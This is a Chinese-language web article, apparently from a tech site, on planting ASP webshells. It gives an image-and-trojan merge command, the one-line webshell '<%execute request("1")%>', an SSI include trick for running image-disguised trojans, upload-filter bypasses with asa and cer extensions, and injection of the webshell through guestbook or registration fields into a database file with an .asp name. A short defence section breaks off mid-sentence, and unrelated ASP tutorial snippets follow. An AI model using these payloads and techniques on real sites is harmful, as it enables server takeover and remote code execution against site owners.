关于 asp 木马
一、木马生成
asp木马代码加密,图片合并,文件时间修改,还有要命的系统漏洞利用
图片和木马合并命令:
copy 1.gif /b + asp.asp /a asp.gif
二、木马上传
如果后台没有类似数据库备份功能,可以生成新文件,或者直接修改文件。那么很难直接让木马运行,不过还是有一些方法,可以考虑。
1、如果后台数据库是以asp格式存储的。那么可以采用在数据库中插入一句话木马(<%execute request("1")%>),然后利用一句话木马上传一个完整木马。
2、如果网站后台允许修改网站联系信息等页面,而且页面也是也是以asp存储,那么可以利用asp的包含文件,巧妙的令jpg、bmp等格式木马得以运行。比如在其中插入
<!-- #include file=/upload/****.jpg -->
3、还可以看看网站上传类型是否有严格的过滤,如果仅仅是限制了asp文件,那么可以尝试上传asa、cer等等。
作为技术性问题,可以这样实现。
一般情况下,在留言板、个人注册等地方,需要个人信息。
而且在进行个人信息中的个人主页、邮件地址等信息,不会有太严格的过滤。这就为插入一句话木马提供了可能性。
举例说明:我给一个网站留言,我在填写我的“个人主页”或者“email”时,不输入真实信息。而输入一句话木马。这样,只要知道了asp数据库地址,那么提交一句话木马后,直接访问asp数据库就可运行木马了。
所以,很多人把acess数据库改名为asp以防止下载,岂不知危害照样存在,只不过换了一种方式而已。
三、如何防护
1、是的,对方猜出正确的数据库路径的几率和同一地点被雷集中两次几率几乎相同。但是需要注意的是在写连接数据库文件时,注意防止暴库
2、是的,而且如果你的数据库不是以asp存放,那么就无所谓了。
3、这个问题有点大。估计网上的讨论也没有停止过,个人认为也没有标准答案。不过,我认为安全是一个整体,必须从多个方面考虑,以分层次防御的方法无疑是一个好办法。
我自己通常是从两个层次进行防护,其一就是数据库改名(包括文件名和后缀名)最好改为你自己
相关文档:
编写过程
过程是一组能执行指定任务且具有返回值的脚本命令。您可以定义自己的过程,然后在脚本中反复调用它们。
您可以将过程定义放在调用过程的 .asp 文件中,也可以将通用过程放在一个共享的 .asp 文件中,然后用 SSI #include 指令将其包含进其他调用其过程的 .asp 文件中。您还可选择另一种方法,即把这些功能打包 ......
使用ASP发送飞信的免费短信
要实现在asp网站上发送飞信,要求是中国移动的手机用户,并且开通移动飞信功能。
使用以下asp代码,修改参数为你的手机号及飞信密码,就可以实现在网站发免费短信功能。
fsend.asp文件源代码如下:
< ......
Application 对象
集合:
Contents
StaticObjects
方法:
Lock
Unlock
事件:
Application_OnEnd
Application_OnStart
ObjectContext 对象
方法:
SetAbort
SetComplete
事件:
OnTransactionAbort
OnTransactionCommit
Request 对象
集合:
ClientCertificate
Cookies
Form
Q ......
VBSCRIPT 的数据类型
VBSCRIPT 只有一种数据类型:variant ,程序根据上下文来判断 variant 为数字类型还是字符串类型。
引号内的数字被看成字符串,如:a="12" ;
不带引号当然就是数字,如:b=13 。
实例:
以下为引用内容:
<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>
<!DOCTYPE html PUBLIC "-//W3C// ......